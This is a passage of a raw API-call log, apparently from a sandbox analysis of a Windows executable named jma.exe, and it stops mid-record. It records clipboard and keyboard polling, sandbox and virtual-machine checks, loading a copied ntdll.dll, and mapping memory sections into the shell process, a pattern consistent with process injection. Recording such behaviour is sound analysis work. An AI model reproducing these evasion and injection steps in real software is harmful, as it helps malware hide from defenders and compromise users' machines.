SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0031.086] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0034.079] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0034.079] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0034.079] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=502, y=588)) returned 1 [0034.079] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0034.079] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10c [0034.082] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0034.082] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0034.082] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0037.075] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0037.075] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0037.075] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=502, y=588)) returned 1 [0037.075] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0037.075] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x114 [0037.081] GetKeyboardState (in: lpKeyState=0x18f8d4 | out: lpKeyState=0x18f8d4) returned 1 [0037.081] SetKeyboardState (lpKeyState=0x18f8d4) returned 1 [0037.081] WaitForSingleObject (hHandle=0x100, dwMilliseconds=0xbac) returned 0x102 [0040.081] ExcludeClipRect (hdc=0x0, left=0, top=0, right=0, bottom=0) returned 0 [0040.081] SendMessageA (hWnd=0x0, Msg=0x1109, wParam=0x0, lParam=0x0) returned 0x0 [0040.081] GetCursorPos (in: lpPoint=0x18f3dc | out: lpPoint=0x18f3dc*(x=502, y=588)) returned 1 [0040.081] DrawFocusRect (hDC=0x0, lprc=0x18f3c4) returned 0 [0040.081] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x118 [0040.084] lstrlenA (lpString="") returned 0 [0040.085] GetTextExtentPoint32A (in: hdc=0x0, lpString="", c=0, psizl=0x18f384 | out: psizl=0x18f384) returned 1 [0040.085] GetIconInfo (in: hIcon=0x0, piconinfo=0x0 | out: piconinfo=0x0) returned 0 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.085] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.086] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] IsClipboardFormatAvailable (format=0x1) returned 1 [0040.087] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12f8 | out: hHeap=0x1ce0000) returned 1 [0040.087] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12d0 | out: hHeap=0x1ce0000) returned 1 [0040.087] HeapFree (in: hHeap=0x1ce0000, dwFlags=0x0, lpMem=0x1ce12c0 | out: hHeap=0x1ce0000) returned 1 [0040.087] lstrcpyA (in: lpString1=0x18f6c4, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0040.087] lstrlenA (lpString="\x7f") returned 1 [0040.087] lstrcpyA (in: lpString1=0x18f7cc, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0040.087] lstrcatA (in: lpString1="\x7f", lpString2="\\*" | out: lpString1="\x7f\\*") returned="\x7f\\*" [0040.088] FindFirstFileA (in: lpFileName="\x7f\\*", lpFindFileData=0x18f9d4 | out: lpFindFileData=0x18f9d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0040.088] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0040.089] lstrcpyA (in: lpString1=0x18f7cc, lpString2="\x7f" | out: lpString1="\x7f") returned="\x7f" [0040.089] lstrcatA (in: lpString1="\x7f", lpString2="\\" | out: lpString1="\x7f\\") returned="\x7f\\" [0040.089] lstrcatA (in: lpString1="\x7f\\", lpString2="" | out: lpString1="\x7f\\") returned="\x7f\\" [0040.089] FindNextFileA (in: hFindFile=0xffffffff, lpFindFileData=0x18f9d4 | out: lpFindFileData=0x18f9d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.089] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0040.089] GetDlgItem (hDlg=0x0, nIDDlgItem=-2041446964) returned 0x0 [0040.089] FindWindowA (lpClassName="ConsoleWindowClass", lpWindowName=0x0) returned 0x0 [0040.089] GetDC (hWnd=0x0) returned 0x1010852 [0040.090] CreatePen (iStyle=0, cWidth=1, color=0xffffff) returned 0x1c300243 [0040.090] CreateSolidBrush (color=0x0) returned 0x3a100867 [0040.090] SelectObject (hdc=0x1010852, h=0x1c300243) returned 0x1b00017 [0040.090] SelectObject (hdc=0x1010852, h=0x3a100867) returned 0x1900010 [0040.092] Ellipse (hdc=0x1010852, left=-243664, top=56530052, right=-243657, bottom=56530059) returned 1 [0040.092] Ellipse (hdc=0x1010852, left=-243657, top=56530052, right=-243650, bottom=56530059) returned 1 [0040.092] CreateSolidBrush (color=0xff) returned 0x410086b [0040.093] GetConsoleTitleA (in: lpConsoleTitle=0x18f464, nSize=0x50 | out: lpConsoleTitle="(âÞ\x01ÿÿ") returned 0x0 [0040.093] FindWindowA (lpClassName=0x0, lpWindowName="(âÞ\x01ÿÿ") returned 0x0 [0040.093] NtdllDefWindowProc_A (hWnd=0x0, Msg=0xfffc4830, wParam=0x8651fdcc, lParam=0xfa6bf930) returned 0x0 [0040.093] GetDlgItem (hDlg=0x0, nIDDlgItem=801) returned 0x0 [0040.093] SendMessageA (hWnd=0x0, Msg=0x8651fdcc, wParam=0x1, lParam=0x0) returned 0x0 [0040.093] SendMessageA (hWnd=0x0, Msg=0x8651fdcc, wParam=0x418390, lParam=0x18f378) returned 0x0 [0040.093] GetDlgItem (hDlg=0x0, nIDDlgItem=801) returned 0x0 [0040.093] GetClientRect (in: hWnd=0x0, lpRect=0x18f3f4 | out: lpRect=0x18f3f4) returned 0 [0040.094] EnumSystemLanguageGroupsA (lpLanguageGroupEnumProc=0x250000, dwFlags=0x1, lParam=0x0) [0043.439] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0043.439] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0062.351] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x2) returned 1 [0062.352] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.352] VirtualProtect (in: lpAddress=0x402000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.352] VirtualProtect (in: lpAddress=0x403000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.352] VirtualProtect (in: lpAddress=0x404000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.353] VirtualProtect (in: lpAddress=0x405000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.353] VirtualProtect (in: lpAddress=0x406000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.353] VirtualProtect (in: lpAddress=0x407000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.353] VirtualProtect (in: lpAddress=0x408000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.353] VirtualProtect (in: lpAddress=0x409000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x18ed38 | out: lpflOldProtect=0x18ed38*=0x40) returned 1 [0062.354] VirtualProtect (in: lpAddress=0x400000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x18ed48 | out: lpflOldProtect=0x18ed48*=0x40) returned 1 [0062.354] VirtualProtect (in: lpAddress=0x401000, dwSize=0x83d1, flNewProtect=0x40, lpflOldProtect=0x18ed48 | out: lpflOldProtect=0x18ed48*=0x40) returned 1 [0062.356] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="kernel32" | out: DestinationString="kernel32") [0062.356] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x76c20000) returned 0x0 [0062.357] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="user32" | out: DestinationString="user32") [0062.357] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x74f40000) returned 0x0 [0062.357] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="advapi32" | out: DestinationString="advapi32") [0062.357] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x74d40000) returned 0x0 [0062.357] RtlInitUnicodeString (in: DestinationString=0x18ed60, SourceString="shell32" | out: DestinationString="shell32") [0062.357] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ed68 | out: BaseAddress=0x18ed68*=0x75fd0000) returned 0x0 [0062.358] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0062.358] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x1dee950 [0062.358] GetKeyboardLayoutList (in: nBuff=1, lpList=0x1dee950 | out: lpList=0x1dee950) returned 1 [0062.358] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18e920 | out: TokenHandle=0x18e920*=0x124) returned 1 [0062.359] GetTokenInformation (in: TokenHandle=0x124, TokenInformationClass=0x19, TokenInformation=0x18e924, TokenInformationLength=0x14, ReturnLength=0x18e91c | out: TokenInformation=0x18e924, ReturnLength=0x18e91c) returned 1 [0062.359] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x18eb60 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0062.359] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0xd5a0f3e9, lpTempFileName=0x18eb60 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp")) returned 0xf3e9 [0062.360] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp")) returned 0 [0062.360] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18e958, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0062.360] CopyFileW (lpExistingFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\f3e9.tmp"), bFailIfExists=0) returned 1 [0062.437] RtlInitUnicodeString (in: DestinationString=0x18e930, SourceString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp" | out: DestinationString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp") [0062.437] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\F3E9.tmp", BaseAddress=0x18e938 | out: BaseAddress=0x18e938*=0x74440000) returned 0x0 [0062.503] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18eb64, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jma.exe")) returned 0x2d [0062.503] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ed60, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ed60, ResultLength=0x0) returned 0x0 [0062.503] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ed68, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ed68, ReturnLength=0x0) returned 0x0 [0062.503] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0062.503] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x1df5600 [0062.504] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0062.504] RtlInitUnicodeString (in: DestinationString=0x18ed34, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0062.504] NtOpenKey (in: KeyHandle=0x18ed54, DesiredAccess=0x9, ObjectAttributes=0x18ed3c*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ed54*=0x12c) returned 0x0 [0062.504] NtQueryKey (in: KeyHandle=0x12c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0062.504] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x1ded6b0 [0062.504] NtQueryKey (in: KeyHandle=0x12c, KeyInformationClass=0x2, KeyInformation=0x1ded6b0, Length=0x2c, ResultLength=0x18ed5c | out: KeyInformation=0x1ded6b0, ResultLength=0x18ed5c) returned 0x0 [0062.504] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0062.504] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x1df5710 [0062.504] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x1df5710, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x1df5710, ResultLength=0x18ed5c) returned 0x0 [0062.505] LocalFree (hMem=0x1df5710) returned 0x0 [0062.505] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0062.505] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x1df5710 [0062.505] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x1df5710, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x1df5710, ResultLength=0x18ed5c) returned 0x0 [0062.505] LocalFree (hMem=0x1df5710) returned 0x0 [0062.505] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0062.505] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x1df5710 [0062.505] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x1df5710, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x1df5710, ResultLength=0x18ed5c) returned 0x0 [0062.505] LocalFree (hMem=0x1df5710) returned 0x0 [0062.505] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0062.505] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x1df5710 [0062.505] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x1df5710, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x1df5710, ResultLength=0x18ed5c) returned 0x0 [0062.505] LocalFree (hMem=0x1df5710) returned 0x0 [0062.505] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0062.505] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x1df5710 [0062.505] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x1df5710, Length=0x7a, ResultLength=0x18ed5c | out: KeyInformation=0x1df5710, ResultLength=0x18ed5c) returned 0x0 [0062.505] LocalFree (hMem=0x1df5710) returned 0x0 [0062.505] LocalFree (hMem=0x1ded6b0) returned 0x0 [0062.505] NtClose (Handle=0x12c) returned 0x0 [0062.505] LocalFree (hMem=0x1df5600) returned 0x0 [0062.505] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x1df5600 [0062.505] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0062.505] RtlInitUnicodeString (in: DestinationString=0x18ed34, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0062.505] NtOpenKey (in: KeyHandle=0x18ed54, DesiredAccess=0x9, ObjectAttributes=0x18ed3c*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ed54*=0x12c) returned 0x0 [0062.506] NtQueryKey (in: KeyHandle=0x12c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0062.506] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x1ded6b0 [0062.506] NtQueryKey (in: KeyHandle=0x12c, KeyInformationClass=0x2, KeyInformation=0x1ded6b0, Length=0x2c, ResultLength=0x18ed5c | out: KeyInformation=0x1ded6b0, ResultLength=0x18ed5c) returned 0x0 [0062.506] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0062.506] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x1df5710 [0062.506] NtEnumerateKey (in: KeyHandle=0x12c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x1df5710, Length=0x50, ResultLength=0x18ed5c | out: KeyInformation=0x1df5710, ResultLength=0x18ed5c) returned 0x0 [0062.506] LocalFree (hMem=0x1df5710) returned 0x0 [0062.506] LocalFree (hMem=0x1ded6b0) returned 0x0 [0062.506] NtClose (Handle=0x12c) returned 0x0 [0062.506] LocalFree (hMem=0x1df5600) returned 0x0 [0062.506] Sleep (dwMilliseconds=0x1388) [0067.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ed30*=0x0, ZeroBits=0x0, RegionSize=0x18ed34*=0x2d870, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ed30*=0x2a0000, RegionSize=0x18ed34*=0x2e000) returned 0x0 [0067.512] GetShellWindow () returned 0x100f2 [0067.512] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x18ecdc | out: lpdwProcessId=0x18ecdc) returned 0x460 [0067.512] NtOpenProcess (in: ProcessHandle=0x18ed2c, DesiredAccess=0x40, ObjectAttributes=0x18ed14*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ed0c*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x18ed2c*=0x12c) returned 0x0 [0067.512] NtDuplicateObject (in: SourceProcessHandle=0x12c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ed30, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ed30*=0x128) returned 0x0 [0067.512] NtCreateSection (in: SectionHandle=0x18ece8, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18ecec, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18ece8*=0x130) returned 0x0 [0067.512] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0xffffffff, BaseAddress=0x18ecf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ecf8*=0x310000, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000) returned 0x0 [0067.512] NtMapViewOfSection (in: SectionHandle=0x130, ProcessHandle=0x128, BaseAddress=0x18ed00*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ed00*=0x2da0000, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000) returned 0x0 [0067.516] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x310000, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jma.exe")) returned 0x2d [0067.516] NtCreateSection (in: SectionHandle=0x18ece4, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18ecec, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18ece4*=0x134) returned 0x0 [0067.516] NtMapViewOfSection (in: SectionHandle=0x134, ProcessHandle=0xffffffff, BaseAddress=0x18ecf4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x15600, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ecf4*=0x3e0000, SectionOffset=0x0, ViewSize=0x18ed04*=0x16000) returned 0x0 [0067.517] NtMapViewOfSection (in: SectionHandle=0x134, ProcessHandle=0x128, BaseAddress=0x18ecfc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, 